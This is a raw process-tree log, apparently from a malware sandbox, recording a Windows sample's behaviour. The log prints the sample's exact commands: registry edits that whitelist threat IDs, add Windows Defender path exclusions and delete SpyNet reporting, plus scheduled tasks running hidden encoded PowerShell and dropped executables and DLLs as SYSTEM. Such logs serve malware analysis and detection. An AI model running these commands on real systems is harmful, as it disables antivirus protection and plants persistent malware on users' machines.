- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4020
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4244
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DyYwGMOhU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DyYwGMOhU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NEwrPvSGentU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NEwrPvSGentU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iRMzUYCAhkbMC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iRMzUYCAhkbMC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oZARwjxMcMUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oZARwjxMcMUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nFdGJOiAxzTYZTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nFdGJOiAxzTYZTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\AZgKexhzWxKGMSOL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\AZgKexhzWxKGMSOL\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyYwGMOhU" /t REG_DWORD /d 0 /reg:323⤵PID:3408
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyYwGMOhU" /t REG_DWORD /d 0 /reg:324⤵PID:3028
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyYwGMOhU" /t REG_DWORD /d 0 /reg:643⤵PID:908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NEwrPvSGentU2" /t REG_DWORD /d 0 /reg:323⤵PID:4868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NEwrPvSGentU2" /t REG_DWORD /d 0 /reg:643⤵PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iRMzUYCAhkbMC" /t REG_DWORD /d 0 /reg:323⤵PID:3364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iRMzUYCAhkbMC" /t REG_DWORD /d 0 /reg:643⤵PID:4688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZARwjxMcMUn" /t REG_DWORD /d 0 /reg:323⤵PID:1440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZARwjxMcMUn" /t REG_DWORD /d 0 /reg:643⤵PID:4316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR" /t REG_DWORD /d 0 /reg:323⤵PID:2408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR" /t REG_DWORD /d 0 /reg:643⤵PID:4660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nFdGJOiAxzTYZTVB /t REG_DWORD /d 0 /reg:323⤵PID:3692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nFdGJOiAxzTYZTVB /t REG_DWORD /d 0 /reg:643⤵PID:2856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ /t REG_DWORD /d 0 /reg:323⤵PID:2884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ /t REG_DWORD /d 0 /reg:643⤵PID:3236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\AZgKexhzWxKGMSOL /t REG_DWORD /d 0 /reg:323⤵PID:208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\AZgKexhzWxKGMSOL /t REG_DWORD /d 0 /reg:643⤵PID:3736
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnUFkEFLe" /SC once /ST 01:46:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnUFkEFLe"2⤵PID:1292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnUFkEFLe"2⤵PID:4972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vFsADyudLcNCFLIiL" /SC once /ST 01:56:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\AZgKexhzWxKGMSOL\jXDyBTktHXvIFQm\CwQNhop.exe\" Ne /oKsite_idKpE 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "vFsADyudLcNCFLIiL"2⤵PID:988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4744 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4968
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3364
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4292
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3444
-
C:\Windows\Temp\AZgKexhzWxKGMSOL\jXDyBTktHXvIFQm\CwQNhop.exeC:\Windows\Temp\AZgKexhzWxKGMSOL\jXDyBTktHXvIFQm\CwQNhop.exe Ne /oKsite_idKpE 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1336 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNoYxGgNiGReyhFIfY"2⤵PID:3444
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3180
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:1464
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:824
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\DyYwGMOhU\LyMztZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "DQYxzwqpnFjMWpp" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DQYxzwqpnFjMWpp2" /F /xml "C:\Program Files (x86)\DyYwGMOhU\pLmqsPN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1216
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DQYxzwqpnFjMWpp"2⤵PID:3980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DQYxzwqpnFjMWpp"2⤵PID:3408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ErFLQwbOwAPnds" /F /xml "C:\Program Files (x86)\NEwrPvSGentU2\pIGhnyV.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JNDkwYKtRGCRi2" /F /xml "C:\ProgramData\nFdGJOiAxzTYZTVB\BmYLaRy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aFiSxxkLgMkoDeABA2" /F /xml "C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR\XWaXdbM.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4460
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XuRScOFPNbKOgbhScQj2" /F /xml "C:\Program Files (x86)\iRMzUYCAhkbMC\HzDsrEN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3180
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LPyXfDhiQUyhASpny" /SC once /ST 04:50:21 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\AZgKexhzWxKGMSOL\HSZuMYho\kqAXYOr.dll\",#1 /Hesite_iduAK 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "LPyXfDhiQUyhASpny"2⤵PID:208
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4972
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:5072
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2712
-
-
-
